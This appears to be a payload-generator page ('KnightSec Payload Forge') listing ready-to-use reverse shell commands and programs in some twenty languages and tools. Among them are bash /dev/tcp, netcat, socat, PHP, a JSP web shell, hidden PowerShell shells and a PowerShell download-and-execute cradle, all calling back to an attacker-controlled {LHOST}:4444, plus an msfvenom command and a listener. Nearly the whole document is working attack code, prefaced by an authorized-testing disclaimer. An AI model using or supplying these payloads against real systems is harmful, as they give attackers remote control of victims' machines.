
KnightSec Payload Forge

Reverse shells, bind shells, web shells, MSFVenom, PowerShell, encoders and file-transfer one-liners — with live LHOST/LPORT substitution, matching listeners, TTY upgrade steps, and educational breakdowns.

For authorized security testing, CTF play and educational use only. You are responsible for ensuring you have permission to test any system you target. KnightSec assumes no liability for misuse.



// Shells that connect back to your listener. Requires outbound TCP from the target.

Bash /dev/tcp — bash — MEDIUM
bash
bash -i >& /dev/tcp/{LHOST}/4444 0>&1
Bash /dev/tcp (fd 196) — bash — MEDIUM
bash
exec 196<>/dev/tcp/{LHOST}/4444; bash <&196 >&196 2>&196
Bash mkfifo — bash — MEDIUM
bash
mkfifo /tmp/f; bash -i <>/tmp/f 2>&1 | nc {LHOST} 4444 >/tmp/f; rm /tmp/f
Bash /dev/udp — bash — QUIET
bash
bash -i >& /dev/udp/{LHOST}/4444 0>&1
sh /dev/tcp — sh — MEDIUM
sh
0<&196; exec 196<>/dev/tcp/{LHOST}/4444; sh <&196 >&196 2>&196
sh mkfifo — sh — MEDIUM
sh
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | sh -i 2>&1 | nc {LHOST} 4444 > /tmp/f
BusyBox nc -e — sh — MEDIUM
sh
busybox nc {LHOST} 4444 -e sh
Python 2 TCP — python2 — MEDIUM
python2
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{LHOST}",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Python 3 TCP — python3 — MEDIUM
python3
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{LHOST}",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
Python 3 (env vars) — python3 — QUIET
python3
export RHOST="{LHOST}"; export RPORT=4444; python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'
Python 3 (compact) — python3 — MEDIUM
python3
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("{LHOST}",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")'
Perl TCP — perl — MEDIUM
perl
perl -e 'use Socket;$i="{LHOST}";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
Perl IO::Socket — perl — MEDIUM
perl
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"{LHOST}:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Ruby TCP — ruby — MEDIUM
ruby
ruby -rsocket -e'f=TCPSocket.open("{LHOST}",4444).to_i;exec sprintf("/bin/bash -i <&%d >&%d 2>&%d",f,f,f)'
Ruby Open3 — ruby — MEDIUM
ruby
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("{LHOST}","4444");$stdin.reopen(c);$stdout.reopen(c);$stderr.reopen(c);$stdin.each_line{|l|l=l.strip;next if l.empty?;(IO.popen(l,&method(:print))rescue nil)}'
PHP exec() — php — LOUD
php
php -r '$sock=fsockopen("{LHOST}",4444);exec("/bin/bash -i <&3 >&3 2>&3");'
PHP passthru() — php — LOUD
php
php -r '$sock=fsockopen("{LHOST}",4444);passthru("/bin/bash -i <&3 >&3 2>&3");'
PHP system() — php — LOUD
php
php -r '$sock=fsockopen("{LHOST}",4444);system("/bin/bash -i <&3 >&3 2>&3");'
PHP popen() — php — LOUD
php
php -r '$sock=fsockopen("{LHOST}",4444);popen("/bin/bash -i <&3 >&3 2>&3","r");'
nc -e — bash — LOUD
bash
nc -e /bin/bash {LHOST} 4444
nc mkfifo (no -e) — bash — MEDIUM
bash
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc {LHOST} 4444 > /tmp/f
ncat -e — bash — LOUD
bash
ncat {LHOST} 4444 -e /bin/bash
ncat UDP — bash — QUIET
bash
ncat --udp {LHOST} 4444 -e /bin/bash
Telnet mkfifo — bash — MEDIUM
bash
TF=$(mktemp -u); mkfifo $TF && telnet {LHOST} 4444 0<$TF | /bin/bash 1>$TF
OpenSSL (encrypted) — bash — QUIET
bash
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect {LHOST}:4444 > /tmp/s; rm /tmp/s
Socat TCP — bash — MEDIUM
bash
socat TCP:{LHOST}:4444 EXEC:/bin/bash
Socat PTY (fully interactive) — bash — MEDIUM
bash
socat TCP:{LHOST}:4444 EXEC:'/bin/bash,pty,stderr,setsid,sigint,sane'
AWK — awk — QUIET
awk
awk 'BEGIN{s="/inet/tcp/0/{LHOST}/4444";while(42){do{printf"$ "|&s;s|&getline c;if(c){while((c|&getline)>0)print$0|&s;close(c)}}while(c!="exit")close(s)}}' /dev/null
Lua TCP — lua — QUIET
lua
lua5.1 -e 'local h,p="{LHOST}",4444;local s=require("socket");local t=s.tcp();t:connect(h,p);while true do local c,_=t:receive();if not c then break end;local f=io.popen(c,"r");local r=f:read("*a");f:close();t:send(r)end;t:close()'
Go (one-shot compile) — go — MEDIUM
go
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","{LHOST}:4444");cmd:=exec.Command("/bin/bash");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/r.go && go run /tmp/r.go &
Java Runtime.exec() — java — LOUD
java
Runtime r=Runtime.getRuntime();Process p=r.exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/{LHOST}/4444;cat <&5 | while read line; do $line 2>&5 >&5; done"});p.waitFor();
Java ProcessBuilder — java — LOUD
java
String[] c={"/bin/bash","-c","exec 5<>/dev/tcp/{LHOST}/4444;cat <&5|while read l;do $l 2>&5 >&5;done"};ProcessBuilder pb=new ProcessBuilder(c);pb.redirectErrorStream(true);pb.start().waitFor();
MSFVenom WAR — bash — LOUD
bash
msfvenom -p java/shell_reverse_tcp LHOST={LHOST} LPORT=4444 -f war -o shell.war
JSP Reverse Shell — jsp — LOUD
jsp
<%@ page import="java.io.*,java.net.*" %>
<%-- When this page is requested, the servlet container opens an outbound
     socket to {LHOST}:4444 and relays bytes between that socket and an
     interactive /bin/bash until the shell exits or the socket closes. --%>
<%
  String host = "{LHOST}";
  int port = 4444;
  Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-i"});
  Socket s = new Socket(host, port);
  InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
  OutputStream po = p.getOutputStream(), so = s.getOutputStream();
  // Polling relay, one byte at a time: shell stdout/stderr -> socket,
  // socket -> shell stdin. Runs inside the request thread of the container.
  while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush(); po.flush();
    Thread.sleep(50); // 50 ms pause between relay passes
    // exitValue() throws while the shell is still running; once it returns
    // normally the shell has ended, so leave the loop.
    try { p.exitValue(); break; } catch (Exception e) {}
  }
  p.destroy(); s.close();
%>
PowerShell TCP Socket — powershell — LOUD
powershell
powershell -nop -w hidden -c "$c=New-Object Net.Sockets.TcpClient('{LHOST}',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$r2=$r+'PS '+(pwd).Path+'> ';$rb=([text.encoding]::ASCII).GetBytes($r2);$s.Write($rb,0,$rb.Length);$s.Flush()};$c.Close()"
PowerShell IEX Cradle — powershell — LOUD
powershell
powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://{LHOST}:4444/shell.ps1')"
PowerShell Base64 Encoded — powershell — LOUD
powershell
powershell -nop -w hidden -enc {PS-B64}
Nim — nim — QUIET
nim
# nim c -r shell.nim
# Client side of a plaintext reverse shell: one outbound TCP connection to
# {LHOST}:4444, then a read-line / execute / reply loop. There is no TLS and
# no authentication on the channel. The observable footprint is a single
# long-lived outbound TCP session plus one child process per command.
import net, os, osproc, strutils
let s = newSocket()
s.connect("{LHOST}", Port(4444))
while true:
  let cmd = s.recvLine()
  # Blank lines re-loop. std/net's recvLine also yields "" once the peer has
  # disconnected, so the loop has no exit path and s.close() below is never
  # reached.
  if cmd.strip() == "": continue
  # execCmdEx returns (output, exitCode); the exit code is discarded and only
  # the captured output text is written back to the socket.
  let (output, _) = execCmdEx(cmd.strip())
  s.send(output)
s.close()
Dart — dart — QUIET
dart
// dart run shell.dart
// Client side of a plaintext reverse shell: connects out to {LHOST}:4444 and
// treats every chunk that arrives on the socket as a command line.
import 'dart:io';
import 'dart:convert';
void main() {
  Socket.connect('{LHOST}', 4444).then((s) {
    s.listen((data) {
      // A fresh /bin/bash is started for every received chunk rather than one
      // persistent shell, so each chunk runs in its own process.
      Process.start('/bin/bash', []).then((p) {
        p.stdin.writeln(utf8.decode(data));
        // Both output streams of that process are piped back onto the socket.
        p.stdout.pipe(s);
        p.stderr.pipe(s);
      });
    });
  });
}
V (Vlang) — v — QUIET
v
// v run shell.v
// Client side of a plaintext reverse shell: one outbound TCP connection to
// {LHOST}:4444, then a read-line / execute / reply loop that ends when an
// empty line is read.
import net
import os
fn main() {
  // A failed connection aborts the program outright.
  mut s := net.dial_tcp('{LHOST}:4444') or { panic(err) }
  for {
    line := s.read_line()
    // An empty line ends the session; nothing closes the socket explicitly.
    if line == '' { break }
    // os.execute runs the (trimmed) line as a shell command and captures
    // its output in res.output.
    res := os.execute(line.trim_space())
    // Write failures are deliberately ignored (`or {}`).
    s.write_string(res.output) or {}
  }
}

// Listener


rlwrap -cAr nc -lvnp 4444

rlwrap adds readline support (↑/↓ history, Ctrl-A/Ctrl-E) to the listener; it is the best default.
